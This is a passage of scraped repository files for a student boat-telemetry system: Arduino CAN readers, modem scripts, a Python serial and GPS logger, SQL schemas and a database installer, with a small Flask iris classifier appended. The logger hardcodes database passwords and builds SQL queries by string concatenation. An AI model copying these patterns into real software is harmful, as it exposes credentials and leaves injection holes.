'u322154547_root';\n$DB_PASS = '****';\n$mysqli = new mysqli($DB_HOST, $DB_USER, $DB_PASS, $DB_NAME);\n\nif (mysqli_connect_errno()) {\n\tprintf(\"Connect failed: %s\\n\", mysqli_connect_error());\n\texit();\n}\n\n$result = $mysqli->query('SELECT * FROM motor ORDER By id DESC LIMIT 1;');\nif ($result->num_rows > 0) {\n \t$row = $result->fetch_assoc();\n $table = [\n\t\t\t'speed' => $row['speed'],\n\t\t\t'throttle'=> $row['throttle'],\n\t\t\t'current' => $row['current'],\n\t\t\t'voltage' => $row['voltage'],\n\t\t\t'contTemp' => $row['contTemp'],\n \t\t\t'motorTemp' => $row['motorTemp'],\n\t\t\t'motErrCode'=> $row['motErrCode'],\n\t\t\t'cntStat' => $row['cntStat'],\n\t\t\t'swStat' => $row['swStat'],\n\t\t\t'Time' => $row['Time'],\n\t\t\t\n\t\t\t'id'=> $row['id']];\n}\nelse {\n\t$table = null;\n}\necho json_encode($table);\n?>\n"
},
{
"alpha_fraction": 0.5349271297454834,
"alphanum_fraction": 0.5943220257759094,
"avg_line_length": 23.108108520507812,
"blob_id": "9740cd036ffc41918796236e27f0bda7b1e2e7d5",
"content_id": "ff1d9543ca594b51628e809fa5ccfb8c62ea6322",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2677,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 111,
"path": "/communication/CAN/arduino_code/kls_can_read.ino/kls_can_read.ino.ino",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "\n#include <mcp2515.h>\n\nMCP2515 mcp2515(10);\nstruct can_frame frame;\n\n\nint speedRPM;\nfloat current;\nfloat voltage;\nuint16_t mot_errCode; \nuint8_t controller_stat;\nuint8_t switch_stat;\n\nunsigned short int throttle; \nint contTemp;\nint motTemp;\n\n\nvoid setup()\n{\n Serial.begin(9600);\n// Serial.println(\"Initializing...\");\n \n mcp2515.reset();\n mcp2515.setBitrate(CAN_250KBPS, MCP_8MHZ);\n\n mcp2515.setNormalMode();\n\n// Serial.println(\"RPM, Throttle, I, V, Contr. Temp., Motor Temp., Switch status, Contr. status, Err. Code\");\n\n\n speedRPM = 1;\n current = 2;\n voltage = 3;\n mot_errCode = 4;\n controller_stat = 5;\n switch_stat = 6;\n throttle = 7;\n contTemp = 8;\n motTemp = 9;\n}\n\n\n\nvoid loop()\n{\n// delay(100);\n\n int errCode = mcp2515.readMessage(MCP2515::RXB1,&frame); \n if (errCode == MCP2515::ERROR_OK) {\n \n\n if (frame.can_id == 2364612101){ // MESSAGE 1\n\n speedRPM = frame.data[1]*256 + frame.data[0];\n current = (frame.data[3]*256 + frame.data[2])/10;\n voltage = (frame.data[5]*256 + frame.data[4])/10;\n\n mot_errCode = frame.data[6] & ( frame.data[7] << 8 );\n\n } else if (frame.can_id == 2364612357){ // MESSAGE 2\n throttle = frame.data[0];\n contTemp = frame.data[1] - 40;\n motTemp = frame.data[2] - 30;\n\n controller_stat = frame.data[4];\n switch_stat = frame.data[5];\n }\n\n\n\n \n } else if (errCode == MCP2515::ERROR_FAIL) {\n// Serial.println(\"ERROR_FAIL\");\n }else if (errCode == MCP2515::ERROR_ALLTXBUSY) {\n// Serial.println(\"ERROR_ALLTXBUSY\");\n }else if (errCode == MCP2515::ERROR_FAILINIT) {\n// Serial.println(\"ERROR_FAILINIT\");\n }else if (errCode == MCP2515::ERROR_FAILTX) {\n// Serial.println(\"ERROR_FAILTX\");\n }else if (errCode == MCP2515::ERROR_NOMSG) {\n// Serial.println(\"ERROR_NOMSG\");\n }\n\n\n\n if (Serial.available() > 0) {\n unsigned char incomingByte = Serial.read();\n// Serial.write(incomingByte);\n if (incomingByte == 0x53){\n unsigned char message[26];\n\n\n\n\n \n memcpy(message+0, &speedRPM, sizeof(speedRPM));\n memcpy(message+4, &throttle, sizeof(throttle));\n memcpy(message+6, ¤t, sizeof(current));\n memcpy(message+10, &voltage, sizeof(voltage));\n memcpy(message+14, &contTemp, sizeof(contTemp));\n memcpy(message+18, &motTemp, sizeof(motTemp));\n memcpy(message+22, &mot_errCode, sizeof(mot_errCode));\n memcpy(message+24, &controller_stat, sizeof(controller_stat));\n memcpy(message+25, &switch_stat, sizeof(switch_stat));\n \n \n Serial.write(message, 26);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.5145228505134583,
"alphanum_fraction": 0.5695963501930237,
"avg_line_length": 22.87387466430664,
"blob_id": "da093185109b85f24110d8874df030b3d061f8c3",
"content_id": "4895d9cfd8897fe9ac5c786d1261e4051426169c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2651,
"license_type": "permissive",
"max_line_length": 110,
"num_lines": 111,
"path": "/communication/CAN/arduino_code/kls_can_read_chars.ino/kls_can_read_chars.ino.ino",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "\n#include <mcp2515.h>\n\nMCP2515 mcp2515(10);\nstruct can_frame frame;\n\n\nint speedRPM;\nfloat current;\nfloat voltage;\nuint16_t mot_errCode; \nuint8_t controller_stat;\nuint8_t switch_stat;\n\nunsigned short int throttle; \nint contTemp;\nint motTemp;\n\n\nvoid setup()\n{\n Serial.begin(9600);\n// Serial.println(\"Initializing...\");\n \n mcp2515.reset();\n mcp2515.setBitrate(CAN_250KBPS, MCP_8MHZ);\n\n mcp2515.setNormalMode();\n\n// Serial.println(\"RPM, Throttle, I, V, Contr. Temp., Motor Temp., Switch status, Contr. status, Err. Code\");\n\n\n speedRPM = 1;\n current = 2;\n voltage = 57;\n mot_errCode = 4;\n controller_stat = 5;\n switch_stat = 6;\n throttle = 7;\n contTemp = 8;\n motTemp = 9;\n}\n\n\n\nvoid loop()\n{\n delay(100);\n\n int errCode = mcp2515.readMessage(MCP2515::RXB1,&frame); \n delay(10);\n if (errCode == MCP2515::ERROR_OK) {\n \n\n if (frame.can_id == 2364612101){ // MESSAGE 1\n\n speedRPM = frame.data[1]*256 + frame.data[0];\n current = (frame.data[3]*256 + frame.data[2])/10;\n voltage = (frame.data[5]*256 + frame.data[4])/10;\n\n mot_errCode = frame.data[6] & ( frame.data[7] << 8 );\n\n } else if (frame.can_id == 2364612357){ // MESSAGE 2\n throttle = frame.data[0];\n contTemp = frame.data[1] - 40;\n motTemp = frame.data[2] - 30;\n\n controller_stat = frame.data[4];\n switch_stat = frame.data[5];\n }\n\n\n\n \n } else if (errCode == MCP2515::ERROR_FAIL) {\n// Serial.println(\"ERROR_FAIL\");\n }else if (errCode == MCP2515::ERROR_ALLTXBUSY) {\n// Serial.println(\"ERROR_ALLTXBUSY\");\n }else if (errCode == MCP2515::ERROR_FAILINIT) {\n// Serial.println(\"ERROR_FAILINIT\");\n }else if (errCode == MCP2515::ERROR_FAILTX) {\n// Serial.println(\"ERROR_FAILTX\");\n }else if (errCode == MCP2515::ERROR_NOMSG) {\n// Serial.println(\"ERROR_NOMSG\");\n }\n\n\n\n if (Serial.available() > 0) {\n unsigned char incomingByte = Serial.read();\n// Serial.write(incomingByte);\n if (incomingByte == 0x53){\n String message;\n\n String delim = \", \";\n\n char tmp_motErr[4];\n sprintf(tmp_motErr, \"%x\", mot_errCode);\n char tmp_cntrStat[4];\n sprintf(tmp_cntrStat, \"%x\", controller_stat);\n char tmp_swStat[4];\n sprintf(tmp_swStat, \"%x\", switch_stat);\n\n message = speedRPM + delim + throttle + delim\n + current + delim + voltage + delim\n + contTemp + delim + motTemp + delim\n + tmp_motErr + delim + tmp_cntrStat + delim + tmp_swStat;\n \n Serial.println(message);\n }\n }\n}\n"
},
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7232142686843872,
"avg_line_length": 17.66666603088379,
"blob_id": "af2a93a021da11facfb447cd9eb2737ee5690641",
"content_id": "ee2ee9706e1d66f097a352fa039ef4df99805345",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 112,
"license_type": "permissive",
"max_line_length": 43,
"num_lines": 6,
"path": "/communication/CAN/SerialLog/voltage2energy.py",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "import csv\n\nimport numpy as np\n\ndef voltage2energy( volt, curveX, curveY ):\n np.interp(volt, curveX, curveY)\n"
},
{
"alpha_fraction": 0.7579618096351624,
"alphanum_fraction": 0.808917224407196,
"avg_line_length": 38.25,
"blob_id": "7205951228ebea85050ec171403374e7ae2c2faf",
"content_id": "b8e5d4b4063a21bafc4261f0bfad6c657420b484",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 157,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 4,
"path": "/README.md",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "## Monaco Energy 2019\n\nThis repository contains all code used for the telemetry of our vessel during\nthe Yacht Club de Monaco 2019 Energy Class Competition.\n"
},
{
"alpha_fraction": 0.7128713130950928,
"alphanum_fraction": 0.7315731644630432,
"avg_line_length": 52.47058868408203,
"blob_id": "365f65bfa22423c13f6920bffd605880f5044776",
"content_id": "e88e3a3c2af03d4160dcccc33cf97a05bc8c0e57",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 909,
"license_type": "permissive",
"max_line_length": 189,
"num_lines": 17,
"path": "/communication/SIM7600X/GSM/wwan0.sh",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "echo \"wwan0 Network Setup Script\"\n\nsudo qmicli -d /dev/cdc-wdm0 --dms-set-operating-mode='online'\nsudo qmicli -d /dev/cdc-wdm0 --dms-get-operating-mode\nsudo qmicli -d /dev/cdc-wdm0 --nas-get-signal-strength\nsudo qmicli -d /dev/cdc-wdm0 --nas-get-home-network\n\nsudo qmicli -d /dev/cdc-wdm0 -w\t\t# this confirms the name of the network interface, typically wwan0\nsudo ip link set wwan0 down\t\t# change the wwan0 to the one returned above if different\necho 'Y' | sudo tee /sys/class/net/wwan0/qmi/raw_ip\nsudo ip link set wwan0 up\n#sudo qmicli -p -d /dev/cdc-wdm0 --device-open-net='net-raw-ip|net-no-qos-header' --wds-start-network=\"apn='internet,ip-type=4\" --client-no-release-cid\nsudo qmicli -p -d /dev/cdc-wdm0 --device-open-net='net-raw-ip|net-no-qos-header' --wds-start-network=\"apn='orange',username='orange',password='orange',ip-type=4\" --client-no-release-cid\n\nsudo udhcpc -i wwan0\nip a s wwan0\nip r s\n"
},
{
"alpha_fraction": 0.5747800469398499,
"alphanum_fraction": 0.5899760127067566,
"avg_line_length": 28.234375,
"blob_id": "d4764e995cba5eb40d4a58458546b996d23dd727",
"content_id": "af2586d63a4195bc342610f39c50bef8419ec26a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3751,
"license_type": "permissive",
"max_line_length": 299,
"num_lines": 128,
"path": "/communication/CAN/SerialLog/logArduPy.py",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python3\n\nimport time\nimport serial\nfrom serial import Serial\nfrom datetime import datetime\nimport struct\nimport sys\n# from collections import namedtuple\nimport numpy as np\nimport mysql.connector as sql\nfrom scipy import interpolate\n\nfrom sys import argv\nimport gps\nimport requests\nimport socket\n\nlat = 0\nlon = 0\nspe_gps = 0\n\n# battFile = open('oceanos_cell_discharge_capacity_14s.csv', mode='r')\n# csv_reader = csv.DictReader(battFile)\nVdata = np.genfromtxt('oceanos_cell_discharge_capacity_14s.csv', dtype=float, delimiter=',', names=True)\nvx = Vdata['voltage']\nvy = Vdata['Percentage']\nfvolt = interpolate.interp1d(vx, vy)\n\nlocaldb = sql.connect(\nhost=\"127.0.0.1\",\nuser=\"root\",\npassword=\"a75033207\",\ndatabase = \"ocdb\"\n)\n\nsession = gps.gps(\"localhost\", \"2947\")\nsession.stream(gps.WATCH_ENABLE | gps.WATCH_NEWSTYLE)\n\n'''\nhostdb = sql.connect(\nhost=\"sql126.main-hosting.eu\",\nuser=\"u322154547_root\",\npasswd=\"oceanos_2019\",\ndatabase = \"test\"\n)\n'''\n\n# configure the serial connections (the parameters differs on the device you are connecting to)\nser = serial.Serial(\n port='/dev/ttyACM0',\n baudrate=9600,\n timeout = 1\n)\n\nser.isOpen()\nser.flush()\n\n# ser.setRTS(True)\n\ntime.sleep(2)\n\n\nprint('Log app for arduino CAN.')\n\nnow = datetime.now() # current date and time\ndate_time = now.strftime(\"%d/%m/%Y, %H:%M:%S\")\nfilename = \"logs/can_log_\"+now.strftime(\"%d%m%Y-%H-%M\")+\".csv\";\n\n\nf= open(filename,\"w+\")\nf.write(date_time + '\\n')\nf.write('date, time, microseconds, speed, throttle, current, voltage, contTemp, motTemp, motErrCode, cntrStat, swStat, Discharge\\n')\nf.close()\n\nwhile 1 :\n ser.write(b'S')\n\n arduinoInput = ser.readline()\n out = datetime.now().strftime(\"%d/%m/%Y, %H:%M:%S, %f\") + ', ' + str(arduinoInput,'ASCII')\n\n elems = out.split(',')\n\n speed = elems[0+3].strip()\n throttle = elems[1+3].strip()\n current = elems[2+3].strip()\n voltage = elems[3+3].strip()\n contTemp = elems[4+3].strip()\n motTemp = elems[5+3].strip()\n motErrCode = elems[6+3].strip()\n cntrStat = elems[7+3].strip()\n swStat = elems[8+3].strip()\n \n \n rep = session.next()\n localcursor = localdb.cursor()\n try :\n if (rep[\"class\"] == \"TPV\"):\n lat = rep.lat\n lon = rep.lon\n spe_gps = rep.speed\n sendQuery_GPS = \"INSERT INTO gps (Latitude, Longitude, Speed) VALUES ('\"+str(lat)+\"','\"+str(lon)+\"','\"+str(spe_gps)+\"')\"\n localcursor.execute(sendQuery_GPS)\n localdb.commit()\n except Exception as e :\n pass\n \n # print(Vdata['Percentage'])\n energy = fvolt(float(voltage))\n\n # print(energy)\n out = out.strip('\\n').strip('\\r') + ', ' + str(energy) + ', ' + str(lat) + ', ' + str(lon) + ', ' + str(spe_gps) +'\\n'\n\n f= open(filename,\"a+\")\n f.write(\"%s\" % out)\n f.close()\n \n print(out)\n sendQuery_CAN = \"INSERT INTO motor (speed, throttle, current, voltage, contrTemp, motorTemp, motErrCode, cntrStat, swStat, energy) VALUES ('\"+speed+\"','\"+throttle+\"','\"+current+\"','\"+voltage+\"','\"+contTemp+\"','\"+motTemp+\"','\"+motErrCode+\"','\"+cntrStat+\"','\"+swStat+\"','\"+str(energy)+\"')\"\n \n localcursor.execute(sendQuery_CAN)\n localdb.commit()\n \n '''\n hostcursor = hostdb.cursor()\n hostcursor.execute(\"INSERT INTO motor (speed, throttle, current, voltage, contrTemp, motorTemp, motErrCode, cntrStat, swStat, energy) VALUES ('\"+speed+\"','\"+throttle+\"','\"+current+\"','\"+voltage+\"','\"+contTemp+\"','\"+motTemp+\"','\"+motErrCode+\"','\"+cntrStat+\"','\"+swStat+\"','\"+str(energy)+\"')\")\n hostdb.commit()\n '''\n \n"
},
{
"alpha_fraction": 0.7899159789085388,
"alphanum_fraction": 0.8403361439704895,
"avg_line_length": 22.600000381469727,
"blob_id": "5363604028e5f52ca1102ebc7ce761cd02f42639",
"content_id": "571c021bd4f01e72787c3fdc1c5f0404f8e8964e",
"detected_licenses": [
"Apache-2.0",
"MIT"
],
"is_generated": false,
"is_vendor": true,
"language": "INI",
"length_bytes": 119,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 5,
"path": "/communication/CAN/arduino_code/vendor/arduino-mcp2515-master/sonar-project.properties",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "sonar.projectKey=autowp_arduino-mcp2515\nsonar.projectName=WheelsAge Backend\nsonar.projectVersion=1.0\n\nsonar.sources=.\n\n"
},
{
"alpha_fraction": 0.7358490824699402,
"alphanum_fraction": 0.7547169923782349,
"avg_line_length": 25.5,
"blob_id": "db0abcb5613854dc01c819b3c1bddac39210ff8c",
"content_id": "58f4aec1f9da9cd80d649e16a1089af507f68e68",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 53,
"license_type": "permissive",
"max_line_length": 35,
"num_lines": 2,
"path": "/communication/SIM7600X/GPS/reset_gps.sql",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "DELETE FROM gps;\nALTER TABLE gps AUTO_INCREMENT = 1;\n"
},
{
"alpha_fraction": 0.5629860162734985,
"alphanum_fraction": 0.6018662452697754,
"avg_line_length": 32.842105865478516,
"blob_id": "f78f88226449ccb0b73dd11a0e07cb1933bed8c2",
"content_id": "8c28721a764fad66bb82f44d69f6cfe1098a48b4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 643,
"license_type": "permissive",
"max_line_length": 47,
"num_lines": 19,
"path": "/database/sql/motor.sql",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "-- ---------------------------\n-- Table structure for motor\n-- ---------------------------\nCREATE TABLE IF NOT EXISTS `motor` (\n `id` INT NOT NULL AUTO_INCREMENT,\n `speed` INT DEFAULT '0',\n `throttle` INT DEFAULT '0',\n `current` DECIMAL(4,2) DEFAULT '0',\n `voltage` DECIMAL(6,2) DEFAULT '0',\n `contrTemp` DECIMAL(6,2) DEFAULT '0',\n `motorTemp` DECIMAL(6,2) DEFAULT '0',\n `motErrCode` VARCHAR(8) DEFAULT '0',\n `cntrStat` VARCHAR(8) DEFAULT '0',\n `swStat` VARCHAR(8) DEFAULT '0',\n `energy` DECIMAL(4,2) DEFAULT '0',\n `Time` TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\n `serverSideName` VARCHAR(15) DEFAULT 'motor',\n PRIMARY KEY (`id`)\n);\n"
},
{
"alpha_fraction": 0.5677083134651184,
"alphanum_fraction": 0.5833333134651184,
"avg_line_length": 9.666666984558105,
"blob_id": "df974e701365f418b7ba5fd9bdc0f60990910422",
"content_id": "6797fd391cbebe09defbf2c753cb01de997c9598",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 192,
"license_type": "permissive",
"max_line_length": 49,
"num_lines": 18,
"path": "/communication/SIM7600X/GPS/GPSloc.cpp",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#include \"GPSloc.h\"\n\nGPSloc::GPSloc()\n{\n\tLat = 0;\n\tLog = 0;\n\tSpeed = -1;\n}\n\nGPSloc::GPSloc(float lat, float log, float speed)\n{\n\tLat = lat;\n\tLog = log;\n\tSpeed = speed;\n}\n\nGPSloc::~GPSloc(){\n}\n"
},
{
"alpha_fraction": 0.4699999988079071,
"alphanum_fraction": 0.5049999952316284,
"avg_line_length": 16,
"blob_id": "f9a2524f75c6763f8c1b18b4121b1ab8751ec7c3",
"content_id": "a68e7b24cd570dc2fa69a5154482332ae12d5e79",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 200,
"license_type": "permissive",
"max_line_length": 45,
"num_lines": 11,
"path": "/communication/SIM7600X/GPS/Makefile",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "CC=g++\r\nDLIBS=-lbcm2835 -lrt -lpthread\r\nOBJS= GPS.o ../arduPi.o ../sim7x00.o GPSloc.o\r\nSMS:$(OBJS) \r\n\t$(CC) -Wall -o GPS $(OBJS) $(DLIBS) \r\n\r\n%.o:%.c\r\n\t$(CC) -c -o $@ $<\r\n\r\nclean:\r\n\trm -f *.o GPS\r\n\r\n"
},
{
"alpha_fraction": 0.6136363744735718,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 16.600000381469727,
"blob_id": "0eb50d54a902d7048e14ca9df7ec3b924710d4a8",
"content_id": "d9cb29f1fecbe66a23e6f2f8ca51da02b361bc87",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 176,
"license_type": "permissive",
"max_line_length": 40,
"num_lines": 10,
"path": "/communication/CAN/SerialLog/logCANOutput.sh",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ntouch logs/log.csv\n# echo < /dev/ttyACM0\n# tail -f /dev/ttyACM0 # >> logs/log.csv\n\n# read -r line < /dev/ttyACM0\n# echo -n $line >> logs/log.csv\n\ncat /dev/ttyACM0\n"
},
{
"alpha_fraction": 0.6405465006828308,
"alphanum_fraction": 0.6453686952590942,
"avg_line_length": 27.440000534057617,
"blob_id": "1bee106f382b5a990afbb7d586ce1886dae85b60",
"content_id": "27ccf3575d209c26c1ed527e4976e61e478e1c85",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 4977,
"license_type": "permissive",
"max_line_length": 129,
"num_lines": 175,
"path": "/database/tools/db_installer.sh",
"repo_name": "OceanosTeam/Monaco2019",
"src_encoding": "UTF-8",
"text": "configure() {\necho \"#############################################\"\necho \"# You entered script configuration area #\"\necho \"# No change will be performed in your DB #\"\necho \"# I will just ask you some questions about #\"\necho \"# your hosts and DB. #\"\necho \"#############################################\"\nMYSQLDUMPPATH=`which mysqldump 2>/dev/null`\nMYSQLPATH=`which mysql 2>/dev/null`\nif [ $? -ne 0 ]; then\necho \"We were unable to find MySQL binaries on your path\"\nwhile :\n do\n echo -ne \"\\nPlease enter MySQL binaries directory (no trailing slash): \"\n read MYSQLBINPATH\n if [ -e \"$MYSQLBINPATH\" ] && [ -d \"$MYSQLBINPATH\" ] && [ -e \"$MYSQLBINPATH/mysqldump\" ] && [ -e \"$MYSQLBINPATH/mysql\" ]; then\n MYSQLDUMPPATH=\"$MYSQLBINPATH/mysqldump\"\n MYSQLPATH=\"$MYSQLBINPATH/mysql\"\n break\n else\n echo \"The data you entered is invalid. Please verify and try again.\"\n exit 1\n fi\n done\nfi\n#DB\necho -ne \"\\nPlease enter Oceanos MySQL Dashboard Server hostname (default localhost): \"\nread OCDBHOST\nif [ -z \"$OCDBHOST\" ]; then\n OCDBHOST=\"localhost\"\nfi\necho -ne \"\\nPlease enter Oceanos MySQL Dashboard Server database name (default ocdb): \"\nread OCDB\nif [ -z \"$OCDB\" ]; then\n OCDB=\"ocdb\"\nfi\necho -ne \"\\nPlease enter Oceanos MySQL Dashboard Server user (default root): \"\nread OCUSER\nif [ -z \"$OCUSER\" ]; then\n OCUSER=\"root\"\nfi\necho -ne \"\\nPlease enter Oceanos MySQL Dashboard Server $OCUSER's password (won't be displayed) :\"\nstty -echo\nread OCPASS\nstty echo\necho \"\"\nif [ -z \"$OCPASS\" ]; then\n echo \"Hum.. I'll let it be but don't be stupid and avoid empty passwords\"\nelif [ \"$OCUSER\" == \"$OCPASS\" ]; then\n echo \"Your password is the same as your user, consider changing that.\"\nfi\nsave_config $1\n}\n\nsave_config() {\nif [ -n \"$1\" ]; then\nCONF=\"$1\"\nelse \nCONF=\"database_installer.rc\"\nfi\necho \"\"\necho \"With these data I can generate a configuration file which can be read\"\necho \"on future updates. WARNING: this file will contain clear text passwords!\"\necho -ne \"Shall I generate config file $CONF? (Y/n):\"\nread SAVE\nif [ \"$SAVE\" == \"y\" -o \"$SAVE\" == \"Y\" -o \"$SAVE\" == \"\" ]; then\ncat <<EOF>$CONF\n#Configuration settings for Oceanos-Dashboard database installer script\nMYSQLDUMPPATH=$MYSQLDUMPPATH\nMYSQLPATH=$MYSQLPATH\nOCDBHOST=$OCDBHOST\nOCDB=$OCDB\nOCUSER=$OCUSER\nOCPASS=$OCPASS\nEOF\nchmod 600 $CONF\necho \"Configuration saved as $CONF\"\necho \"Permissions changed to 600 (rw- --- ---)\"\nelif [ \"$SAVE\" != \"n\" -a \"$SAVE\" != \"N\" ]; then\n save_config\nfi\n}\n\nload_config() {\nif [ -n \"$1\" ]; then\nCONF=\"$1\"\nelse \nCONF=\"database_installer.rc\"\nfi\nif [ -e \"$CONF\" ] && [ -f \"$CONF\" ]; then\n. $CONF\nelse\necho \"Settings file not found: $CONF\"\necho \"You can specify an alternate settings filename:\"\necho $0 config_filename\necho \"\"\necho \"If file doesn't exist it can be created\"\necho \"If nothing is specified script will try to work with ./database_installer.rc\"\necho \"\"\nconfigure $CONF\nfi\n}\n\naskdatabase(){\necho \"#############################################\"\necho \"# WARNING: This section of the script CAN #\"\necho \"# destroy your whole database informatio #\"\necho \"# Read questions carefully before you reply #\"\necho \"#############################################\"\necho \"\"\necho \"Choose full (f) if you don't have any table or would\"\necho \"prefer to erase the existing tables information.\"\necho \"Choose skip (s) to skip Oceanos DB installation and go to\"\necho -ne \"Oceanos DB install type: (f) full, (q) quit? \"\nread OCDBPROMPT\ncase \"$OCDBPROMPT\" in\n\t\"f\"|\"F\") dbinstall; dbupgrade;;\n\t\"q\"|\"Q\") finish;;\n\t*) askdatabase;;\nesac\n}\n\ndbinstall(){\necho \"Deleting database tables for new content.\"\n#$MYDB < login_install.sql &> /dev/null\nsudo $MYSQLDUMPPATH --add-drop-table -h $OCDBHOST -u $OCUSER --password=$OCPASS $OCDB --no-data | grep ^DROP | $MYDB\n}\n\ndbupgrade(){\necho \"Installling new Oceanod Database content.\"\n$MYDB < ../sql/gps.sql &> /dev/null\n$MYDB < ../sql/motor.sql &> /dev/null\n}\n\nocdbackup(){\nwhile :\n do\n echo \"\"\n echo -ne \"Do you want to make a backup copy of your OCDB? (Y/n): \"\n read BKUP\n if [ \"$BKUP\" == \"Y\" -o \"$BKUP\" == \"y\" -o \"$BKUP\" == \"\" ]; then\n echo \"Making a backup of the original Oceanos Dashboard database.\"\n echo \"\"\n sudo $MYSQLDUMPPATH --add-drop-table -h $OCDBHOST -u $OCUSER --password=$OCPASS $OCDB > oceanosdb_backup.sql\n if [ $? -ne 0 ];then\n echo \"\"\n echo \"There was a problem accesing your Oceanos database, either it wasnt created or authentication data is incorrect.\"\n exit 1\n fi\n break\n elif [ \"$BKUP\" == \"n\" -o \"$BKUP\" == \"N\" ]; then\n break\n fi\n done \n}\n\ncreatedatabase(){\necho \"Creating Database if it doesn't exist\"\nmysql --user=$OCUSER --password=$OCPASS -e \"CREATE DATABASE IF NOT EXISTS $OCDB;\"\n}\n\nfinish(){\necho \"\"\necho \"Script execution finished.\"\nexit 0\n}\n\nclear\n\nload_config $1\ncreatedatabase\nMYDB=\"$MYSQLPATH -h $OCDBHOST -u $OCUSER --password=$OCPASS -D $OCDB\"\nocdbackup\naskdatabase\ncp $CONF ../../communication/SIM7600X/GPS\n"
}
] | 24 |
van010/code
|
https://github.com/van010/code
|
845b313f56b6c11845c8ff52651124ea8d8aa034
|
61889d51e81d6cc7925910e74427b17264b7efec
|
85010fefaec5b60a6960a1de75eda3b4ab8af640
|
refs/heads/main
| 2023-03-12T02:28:00.585332 | 2021-02-28T10:49:18 | 2021-02-28T10:49:18 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6495016813278198,
"alphanum_fraction": 0.6495016813278198,
"avg_line_length": 19.066667556762695,
"blob_id": "f02b53527baee4aa1e02b59b139839e9b925d6a5",
"content_id": "08fd5bbf6df609d140f4539f91f40bfd428f8167",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 602,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 30,
"path": "/app.py",
"repo_name": "van010/code",
"src_encoding": "UTF-8",
"text": "import joblib\nimport numpy as np\nfrom flask import Flask, render_template, request\n\n\nmodel = joblib.load('iris.pkl')\napp = Flask(__name__)\n\n\[email protected]('/')\ndef home():\n return render_template('home.html')\n\n\[email protected]('/predict', methods=['POST'])\ndef predict():\n petal_length = request.form['petal_length']\n petal_width = request.form['petal_width']\n arr = np.array([[petal_length, petal_width]])\n predict_ = model.predict(arr)\n return render_template('result.html', data=predict_)\n\n\[email protected]('/figure')\ndef figure():\n pass\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n"
},
{
"alpha_fraction": 0.5844529867172241,
"alphanum_fraction": 0.609404981136322,
"avg_line_length": 27.16216278076172,
"blob_id": "b4507318f7d56b9f38c925e9e32e0faacc300dcd",
"content_id": "a6ef416732355dbf3dc520a8b176db66475aae19",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1042,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 37,
"path": "/iris.py",
"repo_name": "van010/code",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\nimport joblib\nimport matplotlib.pyplot as plt\nfrom sklearn import datasets\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import LinearSVC\n\niris = datasets.load_iris()\nX = iris['data'][:, (2, 3)] # petal length and petal width\ny = (iris['target']).astype(np.float64)\nprint((iris['target'] == 2).astype(np.float64))\n\n\ndef plot_raw_iris():\n plt.plot(X[:, 0][y == 0], X[:, 1][y == 0], 'b^', label='setosa')\n plt.plot(X[:, 0][y == 1], X[:, 1][y == 1], 'r*', label='versicolor')\n plt.plot(X[:, 0][y == 2], X[:, 1][y == 2], 'gs', label='virginica')\n plt.grid()\n plt.legend(loc='best')\n # plt.savefig('iris_demo') # , facecolor='w', edgecolor='w', orientation='portrait')\n plt.show()\n\n\n\n\n\n\n# svm_clf = Pipeline([\n# ('scaler', StandardScaler()),\n# ('linear_svc', LinearSVC(C=1, loss='hinge', random_state=42))\n# ])\n# svm_clf.fit(X, y)\n#\n# 